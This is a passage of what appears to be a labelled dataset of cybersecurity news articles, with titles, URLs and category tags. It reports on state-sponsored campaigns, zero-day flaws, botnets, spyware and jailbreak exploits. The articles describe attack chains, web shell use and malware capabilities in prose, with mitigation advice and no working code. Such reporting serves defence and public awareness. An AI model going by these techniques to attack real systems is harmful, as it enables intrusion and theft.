Tactics, and Procedures) previously associated with Hidden Cobra — an umbrella term used by the US government to describe all North Korean state-sponsored hacking groups. The development continues the trend of North Korea, a heavily sanctioned country, leveraging its arsenal of threat actors to support and fund its nuclear weapons program by perpetrating malicious attacks on US defense and aerospace contractors. While the initial analysis suggested the implants were intended to gather basic victim information so as to assess their value, the latest investigation into Operation North Star exhibits a ""degree of technical innovation"" designed to remain hidden on compromised systems. Not only did the campaign use legitimate job recruitment content from popular US defense contractor websites to lure targeted victims into opening malicious spear-phishing email attachments, the attackers compromised and used genuine websites in the US and Italy — an auction house, a printing company, and an IT training firm — to host their command-and-control (C2) capabilities. ""Using these domains to conduct C2 operations likely allowed them to bypass some organizations' security measures because most organizations do not block trusted websites,"" McAfee researchers Christiaan Beek and Ryan Sherstibitoff said. What's more, the first-stage implant embedded in the Word documents would go on to evaluate the victim system data (date, IP Address, User-Agent, etc.) by cross-checking with a predetermined list of target IP addresses to install a second implant called Torisma, all the while minimizing the risk of detection and discovery. This specialized monitoring implant is used to execute custom shellcode, in addition to actively monitoring for new drives added to the system as well as remote desktop connections. ""This campaign was interesting in that there was a particular list of targets of interest, and that list was verified before the decision was made to send a second implant, either 32 or 64 bits, for further and in-depth monitoring,"" the researchers said. ""Progress of the implants sent by the C2 was monitored and written in a log file that gave the adversary an overview of which victims were successfully infiltrated and could be monitored further."" ",Malware 3 Zero-Day Exploits Hit SonicWall Enterprise Email Security Appliances,https://thehackernews.com/2021/04/3-zero-day-exploits-hit-sonicwall.html,"SonicWall has addressed three critical security vulnerabilities in its hosted and on-premises email security (ES) product that are being actively exploited in the wild. Tracked as CVE-2021-20021 and CVE-2021-20022, the flaws were discovered and reported to the company by FireEye's Mandiant subsidiary on March 26, 2021, after the cybersecurity firm detected post-exploitation web shell activity on an internet-accessible system within a customer's environment that had SonicWall's ES application running on a Windows Server 2012 installation. A third flaw (CVE-2021-20023) identified by FireEye was disclosed to SonicWall on April 6, 2021. FireEye is tracking the malicious activity under the moniker UNC2682. ""These vulnerabilities were executed in conjunction to obtain administrative access and code execution on a SonicWall ES device,"" researchers Josh Fleischer, Chris DiGiamo, and Alex Pennino said. The adversary leveraged these vulnerabilities, with intimate knowledge of the SonicWall application, to install a backdoor, access files, and emails, and move laterally into the victim organization's network."" A brief summary of the three flaws are below - CVE-2021-20021 (CVSS score: 9.4) - Allows an attacker to create an administrative account by sending a crafted HTTP request to the remote host CVE-2021-20022 (CVSS score: 6.7) - Allows a post-authenticated attacker to upload an arbitrary file to the remote host, and CVE-2021-20023 (CVSS score: 6.7) - A directory traversal flaw that allows a post-authenticated attacker to read an arbitrary file on the remote host. The administrative access not only enabled the attacker to exploit CVE-2021-20023 to read configuration files, counting those containing information about existing accounts as well as Active Directory credentials but also abuse CVE-2021-20022 to upload a ZIP archive containing a JSP-based web shell called BEHINDER that's capable of accepting encrypted command-and-control (C2) communications. ""With the addition of a web shell to the server, the adversary had unrestricted access to the command prompt, with the inherited permissions of the NT AUTHORITY\SYSTEM account,"" FireEye said, adding the attacker then used ""living off the land"" (LotL) techniques to harvest credentials, move laterally across the network, and even ""compress a subdirectory [that] contains daily archives of emails processed by SonicWall ES."" In the incident observed by the firm, the threat actor is said to have escalated their attack by conducting an internal reconnaissance activity, albeit briefly, prior to being isolated and removed from the environment, thus foiling their mission. The true motive behind the intrusion remains unclear. SonicWall users are recommended to upgrade to 10.0.9.6173 Hotfix for Windows and 10.0.9.6177 Hotfix for hardware and ESXi virtual appliances. The SonicWall Hosted Email Security product was automatically patched on April 19 and hence no additional action is required. UPDATE The Milpitas-headquartered network security firm labeled the findings as an outcome of routine collaboration with third-party researchers and forensic analysis firms to ensure its products adhere to the security best practices. ""Through the course of this process, SonicWall was made aware of and verified certain zero-day vulnerabilities — in at least one known case, being exploited in the wild — to its hosted and on-premises email security products,"" the company said in a statement to The Hacker News. ""SonicWall designed, tested and published patches to correct the issues and communicated these mitigations to customers and partners."" ",Vulnerability Google Discloses Unpatched 'High-Severity' Flaw in Apple macOS Kernel,https://thehackernews.com/2019/03/cybersecurity-macos-hacking.html,"Cybersecurity researcher at Google's Project Zero division has publicly disclosed details and proof-of-concept exploit of a high-severity security vulnerability in macOS operating system after Apple failed to release a patch within 90 days of being notified. Discovered by Project Zero researcher Jann Horn and demonstrated by Ian Beer, the vulnerability resides in the way macOS XNU kernel allows an attacker to manipulate filesystem images without informing the operating system. The flaw could eventually allow an attacker or a malicious program to bypass the copy-on-write (COW) functionality to cause unexpected changes in the memory shared between processes, leading to memory corruption attacks. Copy-On-Write, also referred to as COW, is a resource-management optimization strategy used in computer programming. In general, if any process (destination) requires a file or data that is already in the memory but created by another process (source), both processes can share the same resource rather than creating a new copy of it, significantly reducing the resource consumption of unmodified copies. However, if the source process needs to make some changes in the data, the copy-on-write (COW) function comes into play and creates a copy of it in the memory so that the destination process can still have access to the data. According to the Project Zero researcher, on Apple's macOS operating system, this copy-on-write behavior works not only with the anonymous memory, but also efficiently handles the page tables and memory mappings. ""This means that, after the destination process has started reading from the transferred memory area, memory pressure can cause the pages holding the transferred memory to be evicted from the page cache,"" reads the advisory detailing the vulnerability. ""Later, when the evicted pages are needed again, they can be reloaded from the backing filesystem."" Google researcher finds that when a mounted filesystem image is mutated directly (for example, by calling pwrite() on the filesystem image), this information is not propagated into the mounted filesystem. Thus, malicious program or an attacker can simply make changes to evicted pages stored on the disk without informing the virtual management subsystem, tricking the destination processes into loading manipulated malicious content into the memory. ""It is important that the copied memory is protected against later modifications by the source process; otherwise, the source process might be able to exploit double-reads in the destination process,"" the resaercher says. In addition to this vulnerability, the Project Zero researcher also found a similar copy-on-write behavior bypass (CVE-2019-6208) by abusing another function on macOS operating system. The researcher notified Apple of both the vulnerabilities back in November 2018 and the company privately acknowledged the existence of the flaws. While Apple patched the latter flaw in January 2019 update, the former flaw remains unaddressed even after the 90-day deadline Project Zero provides the affected companies. So, the researchers made the vulnerability public with a ""high severity"" label and also released the proof-of-concept code that demonstrates the bug, which remains unpatched at the time of writing. Apple is currently working with the Project Zero team on a fix for the vulnerability, which is intended to be included in a future macOS release. ",Malware Cybercriminals Hijack Router DNS to Distribute Android Banking Trojan,https://thehackernews.com/2018/04/android-dns-hijack-malware.html,"Security researchers have been warning about an ongoing malware campaign hijacking Internet routers to distribute Android banking malware that steals users' sensitive information, login credentials and the secret code for two-factor authentication. In order to trick victims into installing the Android malware, dubbed Roaming Mantis, hackers have been hijacking DNS settings on vulnerable and poorly secured routers. DNS hijacking attack allows hackers to intercept traffic, inject rogue ads on web-pages and redirect users to phishing pages designed to trick them into sharing their sensitive information like login credentials, bank account details, and more. Hijacking routers' DNS for a malicious purpose is not new. Previously we reported about widespread DNSChanger and Switcher—both the malware worked by changing the DNS settings of the wireless routers to redirect traffic to malicious websites controlled by attackers. Discovered by security researchers at Kaspersky Lab, the new malware campaign has primarily been targeting users in Asian countries, including South Korea, China Bangladesh, and Japan, since February this year. Once modified, the rogue DNS settings configured by hackers redirect victims to fake versions of legitimate websites they try to visit and displays a pop-up warning message, which says—""To better experience the browsing, update to the latest chrome version."" It then downloads the Roaming Mantis malware app masquerading as Chrome browser app for Android, which takes permission to collect device' account information, manage SMS/MMS and making calls, record audio, control external storage, check packages, work with file systems, draw overlay windows and so on. ""The redirection led to the installation of Trojanized applications named facebook.apk and chrome.apk that contained Android Trojan-Banker."" If installed, the malicious app overlays all other windows immediately to show a fake warning message (in broken English), which reads, ""Account No.exists risks, use after certification."" Roaming Mantis then starts a local web server on the device and launches the web browser to open a fake version of Google website, asking users to fill up their names and date of births. To convince users into believing that they are handing over this information to Google itself, the fake page displays users' Gmail email ID configured on their infected Android device, as shown in the screenshots. ""After the user enters their name and date of birth, the browser is redirected to a blank page at https://127.0.0.1:${random_port}/submit,"" researchers said. ""Just like the distribution page, the malware supports four locales: Korean, Traditional Chinese, Japanese and English."" Since Roaming Mantis malware app has already gained permission to read and write SMS on the device, it allows attackers to steal the secret verification code for the two-factor authentication for victims' accounts. While analysing the malware code, Researchers found reference to popular South Korean mobile banking and gaming applications, as well as a function that tries to detect if the infected device is rooted. ""For attackers, this may indicate that a device is owned by an advanced Android user (a signal to stop messing with the device) or, alternatively, a chance to leverage root access to gain access to the whole system,"" the researchers said. What's interesting about this malware is that it uses one of the leading Chinese social media websites (my.tv.sohu.com) as its command-and-control server and sends commands to infected devices just via updating the attacker-controlled user profiles. According to Kaspersky's Telemetry data, the Roaming Mantis malware was detected more than 6,000 times, though the reports came from just 150 unique users. You are advised to ensure your router is running the latest version of the firmware and protected with a strong password. You should also disable router's remote administration feature and hardcode a trusted DNS server into the operating system network settings. ",Cyber_Attack "Apple left iOS 10 Kernel Code Unencrypted, Intentionally!",https://thehackernews.com/2016/06/apple-ios-kernel.html,"Apple's new iOS 10 recently made headlines after MIT Technology Review revealed that the company had left the kernel of the mobile operating system unencrypted. Yes, the first developer preview of iOS 10 released at WWDC has an unencrypted kernel. When the headline broke, some of the users were surprised enough that they assumed Apple had made a mistake by leaving unencrypted kernel in iOS 10, and therefore, would get reverted in the next beta version of the operating system. However, Apple managed to confirm everyone that the company left the iOS 10 kernel unencrypted intentionally, as the kernel cache does not contain any critical or private information of users. On iOS, the kernel is responsible for things like security and how applications are capable of accessing the parts of an iPhone or an iPad. But, Why Apple had left the iOS wide open when other features like iMessage offer end-to-end encryption? Apple did this on purpose, because by leaving the iOS 10 kernel unencrypted, the company was ""able to optimize the operating system's performance without compromising security,"" an Apple spokesperson told TechCrunch. The kernel is the heart of any operating system. Apple has always kept the kernel under several layers of protection in previous versions of iOS, leaving developers as well as researchers in the dark. So, the unencrypted kernel could help developers and security researchers look more closely at its code and find security flaws. After all, if more eyes are looking for flaws, it would be easier to discover and patch the issues more quickly than before. MIT Technology Review also pointed out that this could prevent government and law enforcement agencies from exploiting vulnerabilities to crack locked iOS devices, like what the FBI did to hack into the San Bernardino shooter's iPhone. ",Vulnerability New Botnet Hunts for Linux — Launching 20 DDoS Attacks/Day at 150Gbps,https://thehackernews.com/2015/09/xor-ddos-attack.html,"A network of compromised Linux servers has grown so powerful that it can blow large websites off the Internet by launching crippling Distributed Denial-of-service (DDoS) attacks of over 150 gigabits per second (Gbps). The distributed denial-of-service network, dubbed XOR DDoS Botnet, targets over 20 websites per day, according to an advisory published by content delivery firm Akamai Technologies. Over 90 percent of the XOR DDoS targets are located in Asia, and the most frequent targets are the gaming sector and educational institutions. XOR creator is supposed to be from China, citing the fact that the IP addresses of all Command and Control (C&C) servers of XOR are located in Asia, where most of the infected Linux machines also reside. How XOR DDoS Botnet infects Linux System? Unlike other DDoS botnets, the XOR DDoS botnet infects Linux machines via embedded devices such as network routers and then brute forces a machine's SSH service to gain root access to targeted machines. Once the attackers have acquired Secure Shell credentials and logged in, they use root privileges to run a simple shell script that secretly downloads and installs the malicious XOR botnet software. However, there is no such evidence that XOR DDoS infects computers by exploiting flaws in the Linux operating system itself. A High-Bandwidth DDoS Attack Akamai's Security Intelligence Response Team (SIRT) has seen DDoS attacks – SYN and DNS floods as the observed attack vectors – with the bandwidth ranging from a few gigabits per second (Gbps) to nearly 179 Gbps. The upper figure is a massive DDoS attack volume that even most multinational corporate networks can not handle. However, the biggest recorded DDoS attacks have hit 400 Gbps. ""Over the past year, the XOR DDoS botnet has grown and is now capable of being used to launch [massive] DDoS attacks,"" Stuart Scholly, senior vice president of Akamai's Security Business Unit, said in a statement. Scholly further added that attackers are switching their focus from Windows botnets and building Linux botnets to launch massive DDoS attacks. However in the past, Windows machines were their primary targets for DDoS malware. How to Detect and Mitigate XOR DDoS Botnet? Akamai's advisory outlines two different methods for detecting the recent version of the XOR malware. To Detect XOR DDoS Botnet in your Network, look for the communications between a bot and its C&C server, using the Snort rule given in the advisory. To Detect XOR DDoS Botnet infection on your Hosts, use the YARA rule also shown in the advisory. Moreover, Akamai also provides a four-step process for removing the XOR DDoS Trojan from your machine, as given below: First, identify the malicious files in two directories (/boot and /etc/init.d) Identify the supporting processes responsible for the persistence of the main process Kill the malicious processes Delete the malicious files (in /boot and /etc/init.d) Additionally, disabling system root login from SSH (Secure Shell), or using a strong password will also defeat this issue. ",Cyber_Attack Europol Now Going After People Who Bought DDoS-for-Hire Services,https://thehackernews.com/2019/01/ddos-for-hire-services.html,"If you were a buyer of any online DDoS-for-hire service, you might be in trouble. After taking down and arresting the operators of the world's biggest DDoS-for-hire service last year, the authorities are now in hunt for customers who bought the service that helped cyber criminals launch millions of attacks against several banks, government institutions, and gaming industry. Europol has announced that British police are conducting a number of live operations worldwide to track down the users of the infamous Webstresser.org service that the authorities dismantled in April 2018. Launched in 2015, Webstresser let its customers rent the service for about £10 to launch Distributed Denial of Service (DDoS) attacks against their targets with little to no technical knowledge, which resulted in more than 4 million DDoS attacks. According to the Europol announcement published on Monday, the agency gained access to the accounts of over 151,000 registered Webstresser users last year when it shut down the service and have now uncovered a ""trove of information"" against some users that could help the agency track them down. Europol said more than 250 users of Webstresser and other DDoS-for-hire services will soon face potential prosecution for the damage they have caused. ""Size does not matter — all levels of users are under the radar of law enforcement, be it a gamer booting out the competition out of a game, or a high-level hacker carrying out DDoS attacks against commercial targets for financial gain,"" Europol said. In the United Kingdom, several webstresser.org users have recently been visited by the police. In the Netherlands, the police are trying to link user profiles to the identities of Dutch people, while ""a Dutch user of webstresser.org has already received this alternative sanction."" Other countries, including the United States, Belgium, Croatia, France, Germany, Greece, Denmark, Romania, Estonia, Hungary, Ireland, Switzerland, Norway, Lithuania, Portugal, Slovenia, Sweden, Australia, Colombia, Serbia, have also joined the fight against DDoS attacks. While some of these countries are focusing their actions specifically against the Webstresser users, some have intensified their activities against the users of any DDoS booter or stresser service. ""To this effect, the FBI seized last December 15 other DDoS-for-hire websites, including the relatively well known Downthem and Quantum Stresser,"" Europol said. ""Similarly, the Romanian police has taken measures against the administrators of 2 smaller-scale DDoS platforms and has seized digital evidence, including information about the users."" So, users of all DDoS-for-Hire services are in danger of being prosecuted. ",Cyber_Attack FinFisher spyware found running on computers all over the world,https://thehackernews.com/2012/08/finfisher-spyware-found-running-on.html,"FinFisher, a software application used by law enforcement agencies for surveillance, appears to be far more widespred than originally thought.Sold by British company Gamma Internationl Gmbh, FinFisher secretly monitors computers by turning on webcams, recording everything the user types with a keylogger, and monitoring Skype calls. It can also bypass popular antivirus products, communicate covertly with remote servers, record emails, chats, and VOIP calls, and harvesting data from the hard drive. On Wednesday, computer security company Rapid7 researcher Claudio Guarnieri shared new details of the workings of FinFisher, a piece of malware sold by UK contractor Gamma Group to government agencies. He found FinFisher servers at work in Australia, Czech Republic, United Arab Emirates, Ethiopia, Estonia, Indonesia, Latvia, Mongolia, Qatar, and the United States. Rapid7 has published the IP addresses and communication ""fingerprint"" of the command and control servers it has discovered. The information can be used in intrusion detection systems. ""If you can identify those networks actually communicating with those IPs, it most likely means some of the people on those networks are being spied on in some way,"" Guarnieri said. Muench, who is based in Munich, has said his company didn't sell FinFisher spyware to Bahrain. He said he's investigating whether the samples used against Bahraini activists were stolen demonstration copies or were sold via a third party. ",Malware "Adobe Issues Critical Patches for ColdFusion, Flash Player, Campaign",https://thehackernews.com/2019/06/adobe-patch-june.html,"It's Patch Tuesday week! Adobe has just released the latest June 2019 software updates to address a total 11 security vulnerabilities in its three widely-used products Adobe ColdFusion, Flash Player, and Adobe Campaign. Out of these, three vulnerabilities affect Adobe ColdFusion, a commercial rapid web application development platform—all critical in severity—that could lead to arbitrary code execution attacks. Here below you can find brief information about all newly patched ColdFusion flaws: CVE-2019-7838 — This vulnerability has been categorized as ""File extension blacklist bypass"" and can be exploited if the file uploads directory is web accessible. CVE-2019-7839 — There's a command injection vulnerability in ColdFusion 2016 and 2018 editions, but it does not impact ColdFusion version 11. CVE-2019-7840 — This flaw originates from the deserialization of untrusted data and also leads to arbitrary code execution on the system. Besides ColdFusion, Adobe has patched just one vulnerability (CVE-2019-7845) in the infamous Flash Player software this month, which is also critical in severity and leads to arbitrary code execution on the affected Windows, macOS, Linux or Chrome OS-based system. This flaw was reported by an anonymous cybersecurity researcher to the Adobe and can now be patched by installing the latest Flash player version 32.0.0.207. The rest 7 flaws that Adobe patched this month resides in Adobe Campaign Classic (ACC), an advanced cross-channel marketing and campaign management platform, one of which is critical in severity, three have been rated important and other 3 poses little threat to users. The only critical flaw (CVE-2019-7843) in Adobe Campaign could allow attackers to execute commands on the affected systems (Windows and Linux) through arbitrary code execution flaw. At the time of writing, the company is not aware of any in-the-wild exploit for the vulnerabilities it addressed today. Adobe has released updated versions of all three vulnerable software for each impacted platform that users should install immediately to protect their systems and businesses from cyber attacks. ",Vulnerability New Adobe Flash Zero-Day Exploit Found Hidden Inside MS Office Docs,https://thehackernews.com/2018/12/flash-player-vulnerability.html,"Cybersecurity researchers have discovered a new zero-day vulnerability in Adobe Flash Player that hackers are actively exploiting in the wild as part of a targeted campaign appears to be attacking a Russian state health care institution. The vulnerability, tracked as CVE-2018-15982, is a use-after-free flaw resides in Flash Player that, if exploited successfully, allows an attacker to execute arbitrary code on the targeted computer and eventually gain full control over the system. The newly discovered Flash Player zero-day exploit was spotted last week by researchers inside malicious Microsoft Office documents, which were submitted to online multi-engine malware scanning service VirusTotal from a Ukrainian IP address. The maliciously crafted Microsoft Office documents contain an embedded Flash Active X control in its header that renders when the targeted user opens it, causing exploitation of the reported Flash player vulnerability. According to cybersecurity researchers, neither the Microsoft Office file (22.docx) nor the Flash exploit (inside it) itself contain the final payload to take control over the system. Instead, the final payload is hiding inside an image file (scan042.jpg), which is itself an archive file, that has been packed along with the Microsoft Office file inside a parent WinRAR archive which is then distributed through spear-phishing emails, as shown in the video below: Upon opening the document, the Flash exploit executes a command on the system to unarchive the image file and run the final payload (i.e., backup.exe) which has been protected with VMProtect and programmed to install a backdoor that is capable of: monitoring user activities (keyboard or moves the mouse) collecting system information and sending it to a remote command-and-control (C&C) server, executing shellcode, loading PE in memory, downloading files execute code, and performing self-destruction. Researchers from Gigamon Applied Threat Research and Chinese cyber-security firm Qihoo 360 Core Security, who spotted and named the malware campaign as ""Operation Poison Needles,"" have not attributed the attack to any state-sponsored hacking group. However, since the maliciously crafted documents in question purport to be an employment application for a Russian state healthcare clinic that is affiliated to the Presidential Administration of Russia and was uploaded on VirusTotal from a Ukrainian IP, researchers believe the attackers could be from Ukraine, considering the political tension between the two countries. The vulnerability impacts Adobe Flash Player versions 31.0.0.153 and earlier for products including Flash Player Desktop Runtime, Flash Player for Google Chrome, Microsoft Edge and Internet Explorer 11. Adobe Flash Player Installer versions 31.0.0.108 and earlier is also affected. Researchers reported the Flash zero-day exploit to Adobe on November 29, after which the company acknowledged the issue and released updated Adobe Flash Player version 32.0.0.101 for Windows, macOS, Linux, and Chrome OS; and Adobe Flash Player Installer version 31.0.0.122. The security updates include a patch for the reported zero-day flaw, along with a fix for an ""important"" DLL hijacking vulnerability (CVE-2018-15983), which could allow attackers to gain privilege escalation via Flash Player and load a malicious DLL. ",Malware Linux Botnet Adding BlueKeep-Flawed Windows RDP Servers to Its Target List,https://thehackernews.com/2019/07/linux-malware-windows-bluekeep.html,"Cybersecurity researchers have discovered a new variant of WatchBog, a Linux-based cryptocurrency mining malware botnet, which now also includes a module to scan the Internet for Windows RDP servers vulnerable to the Bluekeep flaw. BlueKeep is a highly-critical, wormable, remote code execution vulnerability in the Windows Remote Desktop Services that could allow an unauthenticated remote attacker to take full control over vulnerable systems just by sending specially crafted requests over RDP protocol. Though the patches for the BlueKeep vulnerability (CVE–2019-0708) was already released by Microsoft in May this year, more than 800,000 Windows machines accessible over the Internet are still vulnerable to the critical flaw. Fortunately, even after many individuals in the security community developed working remote code exploits for BlueKeep, there is no public proof-of-concept (PoC) exploit available till the date, potentially preventing opportunistic hackers from wreaking havoc. However, cybersecurity firm Immunity just yesterday released an updated version of its commercial automated vulnerability assessment and penetration testing (VAPT) tool, CANVAS 7.23, which includes a new module for the BlueKeep RDP exploit. It appears the attackers behind WatchBog are using their botnet network to prepare ""a list of vulnerable systems to target in the future or to sell to third party vendors for profit,"" warned the researchers from Intezer Lab, who discovered the new WatchBog variant. ""The incorporation of the BlueKeep scanner by a Linux botnet may indicate WatchBog is beginning to explore financial opportunities on a different platform,"" the researchers said. The BlueKeep scanner included in WatchBog scans the Internet and then submits the list of newly discovered RDP hosts, as a hexadecimal data string encrypted using RC4, to the attacker-controlled servers. According to the researcher, the new WatchBog variant has already compromised more than 4,500 Linux machines in the last two months. Although WatchBog is operating since late last year, attackers are distributing its new variant in an ongoing campaign active since early June this year. The newly-discovered WatchBog variant includes a new spreading module along with exploits for some recently patched vulnerabilities in Linux applications, allowing attackers to find and compromise more Linux systems rapidly. The WatchBog Linux botnet malware contains several modules, as structurally briefed below, which leverages recently patched vulnerabilities in Exim, Jira, Solr, Jenkins, ThinkPHP and Nexus applications to compromise Linux machines. Pwn Module CVE-2019-11581 (Jira) CVE-2019-10149 (Exim) CVE-2019-0192 (Solr) CVE-2018-1000861 (Jenkins) CVE-2019-7238 (Nexus Repository Manager 3) Scanning Module BlueKeep Scanner Jira Scanner Solr Scanner Brute-forcing Module CouchDB instances Redis instances Spreading Module Apache ActiveMQ (CVE-2016-3088) Solr (CVE-2019-0192) Code Execution over Redis After scanning and brute-forcing modules discover a Linux machine running the vulnerable application, WatchBog deploys a script on the targeted machine to download Monero miner modules from Pastebin website. The malicious script then also gains persistence on the infected system via crontab and further downloads a new spreader module, which comes in the form of a dynamically linked Cython-compiled ELF executable. Researchers have recommended Linux and Windows administrators to keep their software and operating systems up-to-date against known vulnerabilities in order to prevent themselves from being a victim of such attack campaigns. You can find if WatchBog has infected your Linux machine by checking the existence of the ""/tmp/.tmplassstgggzzzqpppppp12233333"" file or the ""/tmp/.gooobb"" file on your system. ",Malware Bitcoin Talk forum hacked; Database for Sale by Hacker; Website currently down,https://thehackernews.com/2013/10/bitcoin-talk-forum-hacked-database-for.html,"Bitcoin Talk, the popular Bitcoin discussion forum, has been hacked and as it stands the site is currently unreachable. Bitcointalk has been down for nearly 6 hours. The forums have been allegedly hacked and Defaced by ""The Hole Seekers"" and selling 150,000 emails and hashed passwords stolen from Bitcointalk.org for 25 Bitcoins, where the passwords are hashed with sha256crypt. Hacker embedded the ""1812 Overture"" song in the background with a dazzling animated picture show. According to Bitcointalk admin Theymos, it's possible that the hackers gained access to the database. He says the website will not be restored until he figures out precisely what vulnerability the hackers leveraged. He's offering 50 Bitcoin to the first individual who can pinpoint the security hole. See the video below for the Hack-in-Action: ""Hello friend, Bitcoin has been seized by the FBI for being illegal. Thanks, bye"" reads one the message in the video. To be safe, it is recommended that all Bitcoin Forum users consider any password used on the Bitcoin Forum in 2013 to be insecure. There is no further information available currently, but on a Reddit thread the source code of Bitcointalk and JavaScript payload have been made available online for anyone to download. ",Vulnerability Malware infected International Atomic Energy Agency Computers,https://thehackernews.com/2013/10/malware-infected-international-atomic.html,"Hackers and malware are everywhere, waiting for you around every corner of the Internet. The International Atomic Energy Agency (IAEA), which holds highly sensitive information and plays a key role in global efforts to prevent the spread of nuclear weapons, said on Tuesday that some of its computers were infected by malicious software, during the past several months. Malware can typically be used by cyber-attackers to gain remote access to systems, or to steal data, however spokesman Serge Gas said. ""No data from the IAEA network has been affected."" The computers were located in common areas of the agency's Vienna headquarters, known as the Vienna International Centre (VIC). A third-party technician or visitor with the USB-drive infected with crimeware can be used to infect the system. ""The (IAEA) secretariat does not believe that the USB devices themselves were infected or that they could spread the malware further"" he said. Last November, the IAEA revealed that Iranian hackers had accessed one of its former computer servers and posted the contact details of some of the watchdog's experts online. ""Protecting information is vital to the IAEA's work. The agency continuously endeavours to achieve the highest possible level of protection of information,"" Gas said. The authority did not go into explicit details regarding the malware itself, but did stress that the use of removable media had to be reviewed and tightened. ",Malware "Mirage Anti-Bot 2.0 : Protection against ZeuS, SpyEye Malwares",https://thehackernews.com/2012/02/mirage-anti-bot-20-protection-against.html,"Mirage Anti-Bot 2.0 : Protection against ZeuS, SpyEye Malwares Jean-Pierre aka DarkCoderSc and Fred De Vries Develop and Release the second version of Another great security tool named ""Mirage Anti-Bot 2.0"". Zeus and SpyEye were the two main families of botnet software. These types of malware are spread mainly through drive-by downloads and phishing schemes. They are so-called Trojan horses which are designed to steal credentials from various online services like social networks (such as Facebook, Hi5, Yahoo, Netlog), online banking accounts (phising), ftp-accounts, email-accounts and other. They are part of botnets that are estimated to include millions of compromized computers. Because your antivirus program is not always giving you enough protection against these types of malware, so Experts at https://unremote.org/ create this program for you, that can be used as an extra layer of security. Mirage Anti-Bot will be downloading and installing one or more blocklists from www.abuse.ch, a reputable Swiss-based anti-malware website. This effectively stops your computer from reaching infected sites, thus minimizing the risk to be infected with this extremely dangerous type of malware. Changelog : [+] Installer [+] New GUI, More pro [+] Start with Windows [+] Protect you against Palevo, TDL3, Rogues, C&C etc.. [+] Protect you against spyeye botnet [+] Confirm on quit [+] Limit exceed bug fixed, now it grabs data locally using SSL [+] Proxy authentification added Download Mirage Anti-Bot 2.0 ",Malware "LuckyMouse Hackers Target Banks, Companies and Governments in 2020",https://thehackernews.com/2021/04/luckymouse-hackers-target-banks.html,"An adversary known for its watering hole attacks against government entities has been linked to a slew of newly detected intrusions targeting various organizations in Central Asia and the Middle East. The malicious activity, collectively named ""EmissarySoldier,"" has been attributed to a threat actor called LuckyMouse, and is said to have happened in 2020 with the goal of obtaining geopolitical insights in the region. The attacks involved deploying a toolkit dubbed SysUpdate (aka Soldier) in a number of breached organizations, including government and diplomatic agencies, telecom providers, a TV media company, and a commercial bank. LuckyMouse, also referred to as APT27 and Emissary Panda, is a sophisticated cyberespionage group that has a history of breaching multiple government networks in Central Asia and the Middle East. The actor has also been linked to cyberattacks aimed at transnational organizations such as the International Civil Aviation Organization (ICAO) in 2019 and recently attracted attention for exploiting ProxyLogon flaws to compromise the email server of a governmental entity in the Middle East. EmissarySoldier is only the latest in a series of surveillance efforts aimed at the targets. ""In order to compromise victims, LuckyMouse typically uses watering holes, compromising websites likely to be visited by its intended targets, ESET malware researcher Matthieu Faou said in a report published today. ""LuckyMouse operators also perform network scans to find vulnerable internet-facing servers run by their intended victims."" What's more, ESET also observed LuckyMouse infections on an unspecified number of internet-facing systems running Microsoft SharePoint, which the researchers suspect occurred by taking advantage of remote code execution vulnerabilities in the application. Regardless of the method used to gain an initial foothold, the attack chain culminates in the deployment of custom post-compromise implants, SysUpdate or HyperBro, both of which leverage DLL search order hijacking to load malicious payloads and thwart detection. ""The trident model features a legitimate application vulnerable to DLL hijacking, a custom DLL that loads the payload, and a raw Shikata Ga Nai-encoded binary payload,"" Faou noted. For its part, SysUpdate functions as a modular tool, with each component devoted to a particular operational purpose. It involves abusing a benign application as a loader for a malicious DLL, which in turn loads the first-stage payload that ultimately decodes and deploys the memory implant on the compromised system. Since its discovery in 2018, the toolkit has undergone numerous revisions devoted to adding new functionalities, indicating that the operators are actively working to revamp their malware arsenal. ""LuckyMouse was increasingly active throughout 2020, seemingly going through a retooling process in which various features were being incrementally integrated into the SysUpdate toolkit,"" Faou said. ""This may be an indicator that the threat actors behind LuckyMouse are gradually shifting from using HyperBro to SysUpdate."" ",Malware New 'unc0ver' Tool Can Jailbreak All iPhone Models Running iOS 11.0 - 14.3,https://thehackernews.com/2021/03/new-unc0ver-tool-can-jailbreak-all.html,"A popular jailbreaking tool called ""unc0ver"" has been updated to support iOS 14.3 and earlier releases, thereby making it possible to unlock almost every single iPhone model using a vulnerability that Apple in January disclosed was actively exploited in the wild. The latest release, dubbed unc0ver v6.0.0, was released on Sunday, according to its lead developer Pwn20wnd, expanding its compatibility to jailbreak any device running iOS 11.0 through iOS 14.3 using a kernel vulnerability, including iOS 12.4.9-12.5.1, 13.5.1-13.7, and 14.0-14.3. Tracked as CVE-2021-1782, the flaw is a privilege escalation vulnerability in the kernel stemming from a race condition that could cause a malicious application to elevate its privileges. ""We wrote our own exploit based on CVE-2021-1782 for #unc0ver to achieve optimal exploit speed and stability,"" Pwn20wnd said in a separate tweet. The vulnerability has since been addressed by Apple as part of its iOS and iPadOS 14.4 updates released on January 26, 2021, but not before admitting that the issue may have been under active attack by bad actors. The iPhone maker, however, did not disclose how widespread the attack was or reveal the identities of the attackers actively exploiting them. Jailbreaking, similar to rooting on Google's Android, involves a privilege escalation that works by exploiting flaws in iOS to grant users root access and full control over their devices. In doing so, it allows iOS users to remove software restrictions imposed by Apple, thereby allowing access to additional customization and otherwise prohibited apps. For its part, Apple has steadily made it difficult to jailbreak devices by locking down its hardware and software for security reasons, which it says helps counter malware attacks. ZecOps CEO Zuk Avraham said the jailbreak is ""yet another example that attackers have an edge on iOS vs. defenders,"" adding ""[Apple] needs to stop the need to jailbreak the device in the first place and should just enable users to have full access without a need to run an exploit."" Last May, the unc0ver team released a similar jailbreak for iPhones running iOS 11 to iOS 13.5 by exploiting a memory consumption issue in the kernel (CVE-2020-9859). But it was patched by Apple in a matter of days with the release of iOS 13.5.1 to prevent the vulnerability from being exploited maliciously. ",Vulnerability TrickBot Malware Gets UEFI/BIOS Bootkit Feature to Remain Undetected,https://thehackernews.com/2020/12/trickbot-malware-gets-uefibios-bootkit.html,"TrickBot, one of the most notorious and adaptable malware botnets in the world, is expanding its toolset to set its sights on firmware vulnerabilities to potentially deploy bootkits and take complete control of an infected system. The new functionality, dubbed ""TrickBoot"" by Advanced Intelligence (AdvIntel) and Eclypsium, makes use of readily available tools to check devices for well-known vulnerabilities that can allow attackers to inject malicious code in the UEFI/BIOS firmware of a device, granting the attackers an effective mechanism of persistent malware storage. ""This marks a significant step in the evolution of TrickBot as UEFI level implants are the deepest, most powerful, and stealthy form of bootkits,"" the researchers said. ""By adding the ability to canvas victim devices for specific UEFI/BIOS firmware vulnerabilities, TrickBot actors are able to target specific 